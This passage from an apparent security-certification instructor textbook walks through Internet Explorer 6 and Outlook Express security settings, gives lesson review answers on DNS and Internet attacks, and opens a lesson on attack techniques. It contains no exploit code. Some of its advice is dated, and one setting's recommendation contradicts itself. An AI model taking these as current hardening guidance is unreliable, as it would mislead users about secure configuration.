Hackers around the world are, at this very moment, scanning for these systems touse at their discretion.

packet sniffer:A device or program that

monitors the data travellingbetween computers on a

network.

sniffer:A program to capture data

across a computer network.Used by hackers to capture

user ID names andpasswords. Software tool thataudits and identifies network

traffic packets. Is also usedlegitimately by network

operations and maintenancepersonnel to troubleshoot

network problems.

460 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 514: SCNP Hardening

TASK 7D-1Identifying User Vulnerabilities and Internet SecurityConcerns

Setup: This is a group activity.

1. Discuss, with at least one other student, the security issues surroundingusers of the Internet and World Wide Web. Identify the different riskpoints discussed, and list the areas of greatest concern for these users.Define what the potential counters for these risks are.

2. As a group, combine the topics of this lesson into a comprehensive viewof the architecture of the Internet and associated risk points. Use yourprevious work on the physical structure of the Internet, adding potentiallocations of Web servers and users.

3. Once the overall layouts of components, servers, and users have beenidentified, attempt to define the potential risk points for each piece. Arethe risk points for the Internet infrastructure as critical now that youcan combine all the other issues versus when that was the only concern?

4. Try to categorize the risk points of the entire scenario in order of risk.There is no definite order to them, as they are subject to opinion.

Create a consensus on the risk points and outline them for futurereference. These risk points are the same in this scenario as they are on theactual Internet.

Browser Security“The security setting on your browser should match your need for security orprivacy and there’s no cookie cutter approach to this.”—somewhere onwww.dslreports.com.

If you visit http://browsers.evolt.org, you will be presented with an array ofbrowsers, many of which are in use today, including Arachne, Cello, Chimera,Grail, HotJava, IBrowse, Internet Explorer InterGo, Internet Workhorse, I-View,Lotus Notes, Lynx, Mosaic, NeoPlanet, NetCruiser, Netscape, Mozilla, Opera,Quarterdeck, Spyglass, Sesame, Tango, Teleport Pro, Voyager, WebExplorer, andWebTV, among others.

There are text-based browsers, there are voice-based browsers, and there are col-orful and fun browsers that you can customize to change their look and feel. Butthe two most debated browsers are still Internet Explorer and Netscape. The con-sensus is that the browser wars are over, and Netscape lost—at least for thepresent time. Of course, it’s still a good product, so if you’re keeping tabs, youwouldn’t just write it off. Consider this: At the time of this writing, Netscape hadlaunched version 7.0 for Windows, Macintosh, and Linux machines, andNetscape’s browser engine, Gecko, was going to be integrated into parent com-pany AOL’s customized browser—in effect, putting Netscape on the desktops ofover 20 million users.

Lesson 7: Security on the Internet and the WWW 461

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 515: SCNP Hardening

So what is a browser? A browser is the client-side of an application that is typi-cally used to view Web pages hosted on a Web site, which runs the server side ofthe application. Of course, today you can also use a browser to download filesfrom or upload files to a FTP server, or you can use your browser to connect toan IMAP-enabled email server to retrieve and send email.

The concept of a Web browser/Web server combination was thought of, experi-mented upon, and crystallized by Tim Berners-Lee while he worked at CERN inSwitzerland. He literally invented the Web. Of course, someone else claims tohave invented the Internet. Those who would like to learn more about Berners-Lee’s groundbreaking work should read his book.“Weaving the Web.”

Meanwhile, Internet Explorer 6 (IE6) has been marching ahead—hot fixes, ser-vice packs, and all—and taking over market share from earlier versions. Betweenthese new versions of Internet Explorer and Netscape, you get more features, soyou have more configurable options, which therefore translates to more headachesfor network administrators.

General Settings for Internet Explorer 6Let’s look at some of the configurable options in Internet Explorer version 6, allthe while concentrating on those issues that relate to its security. You will firstverify what version of IE you’re running. You will then proceed to go throughthe steps required to configure its security settings. The following tasks are a bitdifferent from the other tasks in the course, in that you are basically doing awalk-through of the various settings in IE so that you can better understand theimplications of changing these settings. You will not actually configure any ofthese settings. You would, by understanding their implications, use this knowl-edge and perhaps use a Group Policy or the Internet Explorer Administrator Kit(IEAK) to configure robust security settings for your enterprise.

TASK 7D-2Viewing the General Settings for Your Browser

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Start Internet Explorer.

2. Choose Help→About Internet Explorer.

3. Verify that your version is 6.x, and click OK. If it is not, upgradeInternet Explorer to version 6.x, so that you can follow the rest of thesteps in the following set of tasks. At the time of this writing, Microsoft hadreleased Service Pack 1 (for IE6).

462 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 516: SCNP Hardening

4. Right-click the Internet Explorer icon on your desktop and chooseProperties. You should see the following dialog box, or one very similar toit.

5. Observe that there are seven tabs: General, Security, Privacy, Content,Connections, Programs, and Advanced. There are security issues related tomany of these tabs, and you will step through them one at a time.

6. Examine the General tab.

7. Examine the Home Page area. Here, you can set your default home page.You should keep an eye out for this, as many malicious programs attempt toset your home page to some naughty site or the other. Even some legitimateprograms like to set their Web site as your home page.

You can manually type in your preferred home page in the address box pro-vided, you can click Use Current to set the home page to the page you arecurrently viewing, you can click Use Default to set the home page toMicrosoft.com, or you can simply click Use Blank to bring up a blank pagewhen you launch IE.

8. Examine the Temporary Internet Files area. This area enables you tospecify the location of the folder where your Temporary Internet Files andcookies are stored.

9. Click Settings. First, you can specify how often IE checks for updates tolocally cached content. You can leave it set to Automatically for now.

Differences that you mightnotice include the name ofthe dialog box itself, and theHome Page address.

Lesson 7: Security on the Internet and the WWW 463

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 517: SCNP Hardening

10. Below this, observe the current location of the Temporary Internet Filesfolder. By default, it is part of your user profile.

You can use the slider to minimize the amount of disk space to use to 1 MBor slide the scale to allow for more space. More space means more caching,therefore a faster browsing experience, but not everyone is comfortable withleaving a lot of cached content lying around on their hard drives. You canalso change the location of this folder by clicking Move Folder. If you dochange this location, you must restart your computer for the changes to takeeffect.

11. Click View Files to see a list of files (Web pages, graphics, and cookies)that are stored in this folder. Close the Explorer window to return to theInternet Options and Settings dialog boxes.

12. Click View Objects to see a list of ActiveX and Java controls that havebeen downloaded to your computer. These files are stored in the%systemroot%\Downloaded Program Files folder. Close the Explorer win-dow to return to the Internet Options and Settings dialog boxes.

13. Click Cancel to return to the General tab.

14. Examine the History area. This area specifies how long the History folderkeeps pages in history. Where is this folder? It can be found as a subfolderin your user profile, normally \Documents and Settings\username\LocalSettings\History.

We are done with security issues in the General tab.

Advanced Settings for Internet Explorer 6You will now look at the settings associated with the Advanced tab. Many impor-tant security settings are to be found here. The settings here are broadly divided,vertically, into Accessibility, Browsing, HTTP 1.1, Multimedia, Printing, Search,and Security. The vast majority of the settings on this tab are check boxes, mean-ing that they are Yes/No settings. The few settings that are not have radio-buttonoptions, so they are Either/Or settings.

TASK 7D-3Viewing the Advanced Settings for Your Browser

Setup: The Internet Properties dialog box is displayed.

1. Click the Advanced tab.

2. Scroll all the way down this list and back up again. Observe that thereare many settings here.

3. Right-click any setting, and choose What’s This? to see an explanation forthat setting.

Many settings, such as Disable Script Debugging and Display A Notification

You can configure yourTemporary Internet Files

folder to be a RAM drive.This way, files will not bewritten to a physical disk.

464 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 518: SCNP Hardening

About Every Script Error are useful for developers who are testing Websites. Some settings have security implications, even though they’re in sec-tions other than the Security section.

4. In the Browsing section, observe the Enable Install On Demand settings.This setting specifies that Internet Explorer or a Web page can automaticallydownload components if a Web page needs them, in order to display thepage properly or to perform a particular task. If you are running a highlysecure environment, you will probably want to turn this off.

5. Observe the Enable Third-party Browser Extensions setting. This settingallows for the use of features created by companies other than Microsoft. Itdoes not allow you to control specific features. This is generally used as atroubleshooting tool, but it can turned off if you do not want to trust anythird-party created extensions.

6. Scroll down to the Security section. There are over a dozen settings herethat directly affect the security of your browser.

7. Observe the Check For Publisher’s Certificate Revocation setting. Thissetting allows you to verify the validity of software by checking to see if thesoftware publisher’s certificate has been revoked or not. This box should bechecked.

8. Observe the Check For Server Certificate Revocation setting. This settingis similar to the previous one, except that we’re dealing with the validity ofa Web site’s certificate. This box should also be checked.

9. Observe the Check For Signatures On Downloaded Programs setting.This setting indicates that a program’s identity will be verified by usingMicrosoft’s Authenticode technology. This box should be checked.

10. Observe the Do Not Save Encrypted Pages To Disk setting. Informationexchanged with a secure Web site is cached locally. This is encrypted infor-mation; however, for the sake of security, you do not want to have this boxchecked.

11. Observe the Empty Temporary Internet Files Folder When Browser IsClosed setting. Of course, you do want to have this box checked.

12. Observe the Enable Integrated Windows Authentication setting. Thissetting allows you to choose whether or not you want to negotiate authenti-cation or use Kerberos. Earlier versions of IE—5, 5.01, and 5.5—enabledKerberos by default. Here, you’re given the choice, so that you can set thisaccording to your specific requirements.

13. Observe the Enable Profile Assistant setting. This setting specifies whetheryou will accept a Web site’s request for Profile Assistant information. ProfileAssistant is set up and configured on the Content tab by clicking My Profile.

14. Observe the Use SSL 2.0 and Use SSL 3.0 settings. The choice here issimply whether you want to use the more secure SSL 3.0, or allow the useof SSL 2.0 as well. This setting depends entirely on the requirements of theenterprise.

The profiles listed by ProfileAssistant are shared withOutlook Express.

Lesson 7: Security on the Internet and the WWW 465

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 519: SCNP Hardening

15. Observe the Use TLS 1.0 setting. Again, the decision to allow TransportLayer Security (another open security standard) depends on the requirementof the enterprise.

16. Observe the Warn About Invalid Site Certificates setting. This settingmust be checked, as it will warn the user if the URL associated with a Website’s certificate is valid or not.

17. Observe the Warn If Changing Between Secure And Not Secure Modesetting. This setting warns the user if the browser is moving from a securesite (https://) to a nonsecure site (http://). It’s worth keeping this checked.

18. Observe the Warn If Forms Submittal Is Being Redirected setting. Thissetting, if checked, warns you when you submit information at a site, but theinformation you submit is actually being sent to some other site. It is usefulto keep this checked, as well.

Security Settings for Internet Explorer 6The Security tab is where you will be able to use the built-in division of all net-works into Local and Internet, or Trusted and Restricted zones. Each of thesezones has its own broad outline of what the security level should be. If you visita site that you have included in your Trusted zone, then this is considered a lowsecurity risk. If you are visiting some site on the Internet that you don’t knowmuch about, then this site could be considered a medium security risk, and so on.The Internet zone is a very generic zone, but with the Intranet, Trusted, andRestricted zones, you can be more explicit with respect to specifying what sitesare included there. You can specify sites via their domain names or even by theirspecific IP addresses.

TASK 7D-4Viewing the Zone Settings for Your Browser

Setup: The Internet Properties dialog box is displayed.

1. Click the Security tab. Observe that there are four content zones listedin the box at the top: Internet, Local Intranet, Trusted Sites, and RestrictedSites.

2. Examine the Security Level For This Zone area. You can set the securitylevel for each of the four zones listed. These Security Levels can be set tothe default four levels represented by the sliding scale such as High,Medium, Medium-Low, and Low, or you could select Custom Level, andthen go about applying specific security settings.

A typical combination might be as shown in the following table:

Zone Security LevelInternet MediumLocal Intranet Medium-LowTrusted Low

466 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 520: SCNP Hardening

Zone Security LevelRestricted High

Default Security SettingsWhat do these default levels—High, Medium, Medium-Low, and Low—mean?Let’s start from lowest level and work our way to the highest level.

• Low: This means that minimal safeguards and warning prompts are pro-vided, most content is downloaded and run without prompts, and all activecontent can run. This security level is therefore appropriate for sites that youspecifically trust.

• Medium-Low: This means that most content will be run without prompts;but unsigned ActiveX controls will not be downloaded. This security level istherefore appropriate for internal networks, such as your intranet.

• Medium: This level provides a level of security similar to Medium-Low, butwith additional safeguards. This security level is therefore appropriate for theInternet.

• High: This level represents the safest setting for the browser, but can alsobecome very difficult to use as most of the functionality of the browser hasbeen disabled, so many sites will not be represented well or not at all. Thissecurity level is therefore appropriate for sites that might have harmfulcontent.

So what are the inner workings for each of these security levels anyway? Let’sset the four zones to their typical default levels and work from there.

TASK 7D-5Implementing Default Security Levels for Zones

Setup: The Internet Properties dialog box is displayed, with the Secu-rity tab active.

1. If necessary, select the Internet zone.

2. Click the Default Level button.

3. If necessary, specify this security level to be Medium by moving the sliderto the appropriate level.

4. Click Apply.

5. If necessary, select the Local Intranet zone.

6. Set this level to Medium-Low.

7. If necessary, select the Trusted Sites zone.

8. Set this level to Low.

Default Security Settings forInternet Explorer

You could also infer thatwhen looked at in this order,each level is a subset of thenext.

Lesson 7: Security on the Internet and the WWW 467

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 521: SCNP Hardening

9. If necessary, select the Restricted Sites zone.

10. Set this level to High.

11. Select each zone, and verify that the slider shows the appropriate secu-rity level for each one.

The Low Security SettingNow that you have set default security levels for the four zones, you will exam-ine their settings. You will begin with examining the settings for Low.

Note: To understand the implications of all these settings, some knowledge aboutWeb site design is required. For instance, if you are unfamiliar with terms such asMETA REFRESH (which is used to redirect to another page) and IFRAME(which is used to created an inline frame for the inclusion of external objects),you might want to review Web sites such as www.htmlhelp.com andwww.pageresource.com. Of course, when you are dealing with anything to dowith Internet Explorer, you can also go straight to Microsoft’s Web site. It is arepository of information.

TASK 7D-6Viewing Detailed Settings for the Security Level Low

Setup: The Internet Properties dialog box is displayed, with the Secu-rity tab active.

1. Select the Trusted Sites zone. The slider should be on Low.

2. Click the Custom Level button.

3. In the Settings dialog box, observe the long list of browser behaviorsettings. These are divided vertically into areas named:

• ActiveX Controls And Plug-ins

• Downloads

• Microsoft VM

• Miscellaneous

• Scripting

• User Authentication

4. Under ActiveX Controls And Plug-ins, verify the settings. They should beset to:

• Download Signed ActiveX Controls: Enable

• Download Unsigned ActiveX Controls: Prompt

• Initialize And Script ActiveX Controls Not Marked As Safe: Prompt

• Run ActiveX Controls And Plug-ins: Enable

• Script ActiveX Controls Marked Safe For Scripting: Enable

468 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 522: SCNP Hardening

5. Under Downloads, verify the settings. They should be set to:

• File Download: Enable

• Font Download: Enable

6. Under Microsoft VM, verify the setting. It should be set to:

• Java Permissions: Low Safety

7. Under Miscellaneous, verify the settings. They should be set to:

• Access Data Sources Across Domains: Enable

• Allow META REFRESH: Enable

• Display Mixed Content: Prompt

• Don’t Prompt For Client Certificate Selection When No Certificates OrOnly One Certificate Exists: Enable

• Drag And Drop Or Copy And Paste Files: Enable

• Installation Of Desktop Items: Enable

• Launching Programs And Files In An IFRAME: Enable

• Navigate Sub-frames Across Different Domains: Enable

• Software Channel Permissions: Low Safety

• Submit Nonencrypted Form Data: Enable

• Userdata Persistence: Enable

8. Under Scripting, verify the settings. They should be set to:

• Active Scripting: Enable

• Allow Past Operations Via Script: Enable

• Scripting Of Java Applets: Enable.

9. Under User Authentication, verify the setting. It should be set to:

• Logon: Automatic Logon With Current Username And Password

10. Click Cancel to return to the Security tab.

The High Security SettingNow that you have seen what the settings are for Low, you will compare thesewith the settings for High. As with the previous task, where you examined thedetails for the Low security setting, to understand the implications of all of thesesettings, some knowledge about Web site design is required.

Lesson 7: Security on the Internet and the WWW 469

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 523: SCNP Hardening

TASK 7D-7Viewing Detailed Settings for the Security Level High

Setup: The Internet Properties dialog box is displayed, with the Secu-rity tab active.

1. Select the Restricted Sites zone. The slider should be on High.

2. Click the Custom Level button. The same categories are displayed as inthe previous task.

3. Under ActiveX Controls And Plug-ins, verify the settings. They should beset to:

• Download Signed ActiveX Controls: Disable

• Download Unsigned ActiveX Controls: Disable

• Initialize And Script ActiveX Controls Not Marked As Safe: Disable

• Run ActiveX Controls And Plug-ins: Disable

• Script ActiveX Controls Marked Safe For Scripting: Disable

4. Under Downloads, verify the settings. They should be set to:

• File Download: Disable

• Font Download: Prompt

5. Under Microsoft VM, verify the setting. It should be set to:

• Java Permissions: Disable Java

6. Under Miscellaneous, verify the settings. They should be set to:

• Access Data Sources Across Domains: Disable.

• Allow META REFRESH: Disable

• Display Mixed Content: Prompt

• Don’t Prompt For Client Certificate Selection When No Certificates OrOnly One Certificate Exists: Disable

• Drag And Drop Or Copy And Paste Files: Prompt

• Installation Of Desktop Items: Disable

• Launching Programs And Files In An IFRAME: Disable

• Navigate Sub-frames Across Different Domains: Disable

• Software Channel Permissions: High Safety

• Submit Nonencrypted Form Data: Prompt

• Userdata Persistence: Disable

7. Under Scripting, verify the settings. They should be set to

• Active Scripting: Disable

• Allow Paste Operations Via Script: Disable

• Scripting Of Java Applets: Disable

470 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 524: SCNP Hardening

8. Under User Authentication, verify the setting. It should be set to:

• Logon: Prompt For Username And Password

9. Click Cancel to return to the Security tab.

The Microsoft Virtual MachineSo, the differences between Low and High are quite obvious. While Low enablesmost settings and prompts for a few, High disables most settings and prompts fora few. Medium-Low and Medium lie somewhere in between.

One of the settings has to do with Microsoft VM. What is Microsoft VM? Itstands for Microsoft Virtual Machine and is basically a module that Microsoftintroduced for implementing Java code on Windows machines. You may havenoticed that one of the settings for Microsoft VM Java Permissions, apart fromLow, Medium, High or Disable, is Custom. What can you do with the Customsetting?

TASK 7D-8Viewing the Custom Settings for Microsoft VM (JavaSettings)

Setup: The Internet Properties dialog box is displayed, with the Secu-rity tab active.

1. Select the Internet zone.

2. Click the Custom Level button.

3. Scroll down to Microsoft VM.

4. For Java Permissions, click Custom.

5. Observe the Java Custom Settings button towards the bottom of the dia-log box.

6. Click Java Custom Settings. A dialog box with two tabs—View Permis-sions and Edit Permissions—is displayed.

7. Examine the View Permissions tab. Many security settings, broadly dealingwith Permissions Given To Unsigned Content, Permissions That Signed Con-tent Are Allowed, and Permissions That Signed Content Are Denied, arelisted.

8. Select the Edit Permissions tab.

9. Observe that you can change these permissions.

10. Right-click anywhere in this box, and observe the Permissions Helppop-up that is displayed.

Lesson 7: Security on the Internet and the WWW 471

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 525: SCNP Hardening

11. In the Permissions Help window, click User Directed File I/O, and readthe explanation for it.

12. Close the Help window.

13. Click Cancel twice.

How to Make Best Use of These ZonesEarlier, there was a discussion on the four zones: Internet, Intranet, Trusted, andRestricted Sites. The Internet, of course, is a superset of all sites that are not onyour intranet. Therefore, when you select the Internet zone, the Sites button isgrayed out; however, when you select any of the other three zones, the Sites but-ton is available for use. This enables you to explicitly specify which Web sitesyou want to include in the zone, and therefore the security level that applies tothe specified Web sites.

TASK 7D-9Adding Sites to a Zone

Setup: The Internet Properties dialog box is displayed, with the Secu-rity tab active.

1. Select the Local Intranet zone.

2. Click the Sites button.

3. Observe the check boxes for Include All Local (Intranet) Sites NotListed In Other Zones, Include All Sites That Bypass The Proxy Server,and Include All Network Paths (UNCs).

4. Click the ? in the upper-right corner of the dialog box. Then click eachof these descriptions in turn to find out more about the options.

5. Click the Advanced button.

6. Under Add This Web Site To The Zone, enter http://internalweb.scp toadd a Web site.

7. Click Add, then click OK twice.

8. Select the Trusted Sites zone.

9. Click the Sites button.

10. Under Add This Web Site To The Zone, enter https://*.mybank.com toadd a Web site.

11. Observe that Require Server Verification (https:) For All Sites In ThisZone is checked.

472 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 526: SCNP Hardening

12. Click Add, and then click OK.

13. Add, to the Restricted Sites zone, the Web site http://*.somebadsite.com.

CookiesNext, you will look at how your Web browser is configured to handle cookies.These come under the purview of privacy settings. To learn more about privacyissues on the Internet, you should visit the Platform for Privacy PreferencesProject at www.w3.org/P3P.

TASK 7D-10Viewing Cookie Handling Settings

Setup: The Internet Properties dialog box is displayed, with the Secu-rity tab active.

1. Click the Privacy tab.

2. Observe the slider scale. It enables you to select six levels of cookie han-dling for the Internet Zone, from Accept All Cookies to Block All Cookies.

3. Slide the scale from one extreme to the other, stopping at each of the sixlevels. Read the descriptions for each setting. For example, the defaultcookie handling level for the Internet zone is Medium—this level blocksthird-party cookies that do not have a compact privacy policy, blocks third-party cookies that use personally identifiable information without yourexplicit consent, and restricts first-party cookies that use personally identifi-able information without implicit consent.

4. Click Advanced, and observe that you can override the default levelsand come up with your own settings. Click Cancel.

5. Click the Edit button. This option enables you to override cookie handlingfor individual Web sites.

6. Enter somebadsite.com, and click Block.

7. Enter mybank.com, and click Allow.

8. Click OK.

Content RatingsNext, you will look at the Content tab. The Content tab enables you to controloptions associated with three very different sets of options. One has to do withWeb site ratings, the onus of implementing this being with the Web host and theresponsibility of controlling access to rated sites being with the browser. Anotheroption has to do with certificates. The third option has to do with your ProfileAssistant.

profile:Patterns of a user’s activitywhich can detect changes innormal routines.

Lesson 7: Security on the Internet and the WWW 473

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 527: SCNP Hardening

TASK 7D-11Viewing Content Ratings

Setup: The Internet Properties dialog box is displayed, with the Pri-vacy tab active.

1. Click the Content tab.

2. Observe that the settings are split into three broad divisions: ContentAdvisor, Certificates, and Personal Information.

3. Under Content Advisor, click the Enable button to display a page thatenables you to specify various levels of settings associated with what some-one using this browser is permitted to view in relation to subjects such aslanguage, nudity, sex, and violence (much like movie and TV ratings).

4. Select Language. Then adjust the slider from Level 0 (Inoffensive Slang)through Level 4 (Explicit Or Crude Language).

5. Select Nudity. Then adjust the slider from Level 0 (No Nudity) throughLevel 4 (Provocative Display Of Frontal Nudity).

6. Select Sex. Then adjust the slider from Level 0 (None) through Level 4(Explicit Sexual Activity).

7. Select Violence. Then adjust the slider from Level 0 (No Violence)through Level 4 (Wanton And Gratuitous Violence).

Using Content RatingsThese ratings are presently governed by the Internet Content Rating Association(ICRA), an independent organization. For more information, please visitwww.icra.org. The whole effort is voluntary on the part of the Web author, whocompletes an online questionnaire describing the content of the Web site. ICRAgenerates a content label, which is added to the site by the Web author. When abrowser points to this Web site and its settings are equal to or greater than thatposted on the Web site, the person is allowed to visit that site.

TASK 7D-12Configuring a Browser to Use Content Ratings

Setup: The Internet Properties dialog box is displayed, with the Con-tent tab active, and the Content Advisor dialog box displayed.

1. Change the rating levels to anything you like for each of the fouroptions presented.

2. Click the Approved Sites tab. Here, you can enter domain names that arealways allowed or never allowed, regardless of the rating.

You can also rate your Website when hosting it on IIS

5.0.

474 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 528: SCNP Hardening

3. Click OK, and observe that the Create Supervisor Password dialog boxis displayed. Here, you can enter a password to lock these settings intoplace. Enter the password 1234, and confirm it. Enter any hint youwant.

4. Click OK.

5. Observe the pop-up informing you that Content Advisor is enabled.

6. Click OK.

7. Now, click Settings. Observe that you are now required to enter a pass-word before you can continue.

8. Click Cancel.

9. Click Disable.

10. Observe that you have to enter the password to disable the Content Rat-ing option.

11. Click Cancel.

CertificatesNext, you will take a brief look at the Certificates section and see how it is usedby your browser. This is a very important section related to security and verydetailed discussions and tasks dealing with implementing certificates and certifi-cate authorities in your enterprise are dealt with in the courses that compriseLevel 2 of the SCP.

TASK 7D-13Properties of the Certificates Section

Setup: The Internet Options dialog box is displayed, with the Contenttab active.

1. Click the Certificates button to display the Certificates dialog box.

2. Observe that there are four tabs: Personal, Other People, IntermediateCAs, and Trusted Root CAs.

You do not have any personal certificates at this stage, nor do you have cer-tificates from other people at this point. However, click the Intermediateand Trusted Root CAs, and observe the list of certificates that aredisplayed.

These are certificates pre-loaded for you by Microsoft. Basically, this is alists of all the Certificate Authorities trusted by your browser. For example,when you go to perform a transaction on an SSL-enabled Web site, if thatWeb site was protected by a valid certificate obtained from one of the CAs

Lesson 7: Security on the Internet and the WWW 475

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 529: SCNP Hardening

on your list, you will know. If not, you will know that as well.

3. Click Close.

Your Personal InformationYour browser can maintain information about you personally, if you want it to.Now, you will look at the Personal Information section.

TASK 7D-14Viewing the Handling of Personal Information by aBrowser

Setup: The Internet Properties dialog box is displayed, with the Con-tent tab active.

1. Click the AutoComplete button. Based on the settings here, your browserwill keep a record of things you have typed using your browser and willautomatically help you out. It is up to you to determine if you want to keepthis setting active.

If you wanted to clear the history of AutoComplete, you could also use theClear Forms and Clear Passwords buttons.

2. Click Cancel.

3. Click the My Profile button. If you have been using your email client, Out-look Express, you might see some entries in the Address Book. If not, youwill see a gray box.

4. Observe that the radio button for Create A New Entry In The AddressBook To Represent Your Profile is already selected.

5. Click OK.

6. Enter a user name and an email address. You can also specify more infor-mation about yourself by using the other tabs.

7. Click OK. You now have a profile that can be used if required.

When a Web site requests Profile Assistant information and if the corre-sponding setting is checked, then you will be asked if you want to share theprofile information stored here.

8. Click OK to close the Internet Properties dialog box.

476 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 530: SCNP Hardening

Email SecurityOutlook Express 6 is the email client that comes bundled with Internet Explorer6. You can configure Outlook Express (OE) to retrieve and send mail via morethan one email server. The current version also enables you to have more thanone user account (identity) associated with the client.

You will now look at some of the security issues surrounding this email client.

TASK 7D-15Basic Security Settings to Take Care of With Your EmailClient

1. Double-click your Outlook Express client. If the Internet ConnectionWizard is displayed, click Cancel and then click Yes to close the Wizard.

2. Select the Inbox, and observe that it contains a welcome message fromMicrosoft. When the message is highlighted, you can see a preview ofthat message in the pane below. As we discussed earlier, these are goodintentions that can get exploited. Your first priority should be to turn off thisPreview feature.

3. Choose View→Layout.

4. In the lower half of this dialog box, uncheck Show Preview Pane.

5. Click OK.

6. If you’re being spammed and you want to filter this yourself, chooseTools→Message Rules→Blocked Senders List.

7. Click Add. Here, you can specify specific email addresses or domain namesthat you want to block.

8. Click Cancel twice.

9. Choose Tools→Options.

10. Click the Security tab, and observe the configuration options.

You can specify that OE stay within the Restricted Sites zone.

You can configure OE to warn you if some other application tries to sendemail as you.

You can configure OE to not allow attachments to be saved or opened thatcould potentially be a virus (however, most organizations depend on morerobust solutions on the mail servers themselves to do such scanning).

You can specify that OE digitally sign and/or encrypt all outgoing messages.

11. Click the Advanced button. You can specify encryption strengths to checkfor, specify to include your digital ID when sending signed messages, andcheck for revoked Digital IDs.

Lesson 7: Security on the Internet and the WWW 477

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 531: SCNP Hardening

12. Click Cancel twice.

13. Choose File→Identities→Add New Identity. Enter a name for the newidentity and click OK. When you are prompted to switch to the newidentity, click Yes. The Internet Connection Wizard is displayed.

14. Enter any name for yourself, and click Next.

15. Enter any email address for yourself, and click Next.

16. Enter any mail server’s address (IP address or domain name), and clickNext.

17. Enter any password.

18. Depending on your mail server, you may have to specify SPA. Leave itunchecked here, and click Next.

19. Click Finish.

Note: Perform step 20 through step 22 only if you entered a live mail serveraddress in step 16.

20. Select the mail server, and click Properties.

21. Click the Security tab. You can specify the strength of the encrypting algo-rithm to use.

22. Click Cancel, and then click Close.

Note: Perform the following step on all computers.

23. Close all open windows.

SummaryIn this lesson, we discussed the physical structure of the Internet and itscomponents. You were introduced to terminologies—such as NSPs, NAPs,and ISPs—and technologies—such as DNS—as they relate to the Internetand security. The common attack points of the Internet were described, aswere standard methods of Web hacking. You also looked at the Internet userat risk, and the methods that an attacker can use against individual users.Further, you identified browser security options in extreme detail—everysingle tab and option available was discussed. You also took a brief look athow to secure your email client.

If you use a hotmail.comaccount, the steps will be

slightly different than listedhere.

478 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 532: SCNP Hardening

Lesson Review7A How many Root DNS servers are there on the Internet, and in how

many countries are they distributed?

There are 13 Root DNS servers distributed across four countries.

In what three broad areas of activity is ICANN involved?

DNS support, addressing support, and protocol support.

What qualifications are required for a Tier Two ISP?

Tier-Two ISPs obtain their bandwidth from Tier One and have a local orregional backbone network. They have at least 50,000 subscribers and pro-vide service at a state or national level.

7B List a few methods used by malicious attackers for targeting DNS.

DNS cache poisoning, DNS Server compromise, and DNS response spoofing.

What routing protocol is used on Backbone routers?

BGP or Border Gateway Protocol.

What versions of BIND were susceptible to the Lion worm?

Most BIND versions 8.2.x were susceptible to the Lion worm. This waspatched from BIND 8.2.3 and above.

7C What does the CVE mean when it uses numbers prefixed with CAN?

Before vulnerabilities are classified with a CVE prefix (during the researchphase), they are classified with a CAN (or CANdidate) prefix.

What does HFNetChk from Microsoft help you do?

HFNetChk enables you to quickly record what hot fixes and/or service packsyou have running on your Windows NT or 2000 machine.

What template is recommended by Microsoft to secure a machine that isrunning IIS 5.0?

Microsoft recommends that you apply the hisecweb.inf template.

7D Under which tab in Internet Explorer’s Internet Options dialog boxwould you be able to configure the browser to check for publisher’s cer-tificate revocation?

On the Advanced tab, in the Security section.

Describe how you would configure your browser to trust a site.

On the Security tab, select the Trusted Sites zone, click the Sites button, andadd the domain name or IP address of the Web site.

Lesson 7: Security on the Internet and the WWW 479

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 533: SCNP Hardening

You have configured your browser to not accept cookies by default.However, there are certain sites you want to go to that require you tohave cookies enabled. Describe how you would configure your browserto allow cookies from such a site.

On the Privacy tab, click the Advanced button. Override the default behaviorby specifying Web sites that you want to explicitly accept cookies from.

As an administrator, you need to secure your users’ email clientsoftware. What is one of the first and easiest settings to take care of?

Disabling the Preview pane.

480 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 534: SCNP Hardening

Attack Techniques

OverviewIn this lesson, you will be introduced to the common techniques used toattack networks and various operating systems. You will follow examples onhow to map networks, identify the types of operating systems on the net-work, and scan for potential holes in those operating systems. You will beintroduced to the concepts behind viruses, Trojan Horses, and worms. Youwill identify the techniques used in password cracking, and you will exploreand discuss basic scripting techniques.

ObjectivesTo become familiar with attacking techniques, you will:

8A Define the process of network reconnaissance.

Given a network scenario, you will describe how to use network recon-naissance to gather information about a target.

8B Map a network with provided tools.

Given a simple network scenario, you will use tracing tools to map thephysical layout of a network.

8C Sweep a network with the provided tools.

Given a simple network scenario, you will use network sweeping tools toidentify active hosts in a target network.

8D Scan a network with provided tools.

Given a simple network scenario, you will use network scanning tools todetermine which ports are open on target computers.

8E Differentiate between a virus, a worm, and a Trojan Horse.

